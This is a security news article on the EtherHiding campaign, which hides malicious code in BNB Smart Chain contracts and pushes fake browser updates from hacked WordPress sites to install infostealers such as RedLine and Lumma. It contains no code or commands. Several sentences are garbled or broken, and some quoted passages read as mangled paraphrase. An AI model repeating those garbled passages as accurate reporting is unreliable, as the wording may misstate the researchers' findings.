Threat actors have been seen using Binance’s Smart Chain (BSC) contracts to deliver malicious code in what has been called the “next level of bulletproof hosting.”
Guardio Labs has given the campaign, which it discovered two months ago, the codename EtherHiding.
The novel turn represents the most recent iteration in an ongoing malware campaign
that leverages compromised WordPress sites to serve unsuspecting visitors a fake warning to update their browsers before the sites can be accessed, ultimately leading to the deployment of information stealer malware such as Amadey, Lumma, or RedLine.
“While their initial method of hosting code on abused Cloudflare Worker hosts was taken down, they’ve quickly pivoted to take advantage of the decentralized, anonymous, and public nature of blockchain,” security researchers Nati Tal and Oleg Zaytsev said.
“This campaign is up and harder than ever to detect and take down.”
The existence of threat actors is not surprising. targeted WordPress sites via both malicious plugins, as well as take advantage of publicly disclosed security flaws in popular plugins to breach websites. This gives the ability to completely hijack infected websites at will.
The most recent attacks inject obfuscated Javascript designed to query the server into the infected sites.
BNB Smart Chain by creating a smart contract with an attacker-controlled blockchain address.
The objective is to retrieve a second-stage script from a command-and-control (C2) server that, in turn, retrieves a third-stage payload to serve the false browser update notices.
If a victim clicks the update button on the fake overlay, they are redirected to Dropbox or another trustworthy file hosting service where they can download a malicious executable.
There has yet no way to intervene and break up the attack chain, despite the fact that the email address and the associated agreement have been identified as being used in a phishing scheme. This is because they are hosted on a decentralized service.
“As this is not a username or password used in any financial issues or other activity that those targeted can be pulled to give funds or other kinds of proprietary information to — visitors of damaged WordPress pages don’t have a clue as to what really goes on under the hood,” the investigators stated.
“This contract, tagged as fake, ill-gotten, or whatnot, is still online and delivers the malicious payload.”
Known as ClearFake, the larger campaign was described in more detail by Sekoia as a “JavaScript arrangement deployed on hacked websites in order to provide further malware utilizing the drive-by download the technique.”
The French cybersecurity company claims that the attack chains have been seen to result in the launch of malware loaders known as IDAT Loader and HijackLoader, which serves as a launchpad for various trojans and commodity thieves like DanaBot, Lumma, Raccoon, RedLine, Remcos, SystemBC, and Vidar.
“Based on the code similarities between IDAT Loader and HijackLoader, and given the overlap in the C2 infrastructures, […] the same threat group operates both loaders,” it said, noting that there are tactical overlaps ClearFake and SocGholish, raising the possibility that two malware families are likely maintained by one actor.
SocGholish, also called FakeUpdates, refers to a persistent threat that involves tricking users into downloading JavaScript-based malware under the guise of web browser updates. With plugins becoming a sizable attack surface for WordPress, it’s recommended that users relying on the content management system (CMS) adhere to security best practices and keep their systems up-to-date with the latest patches, remove unwanted admin users, and enforce strong passwords.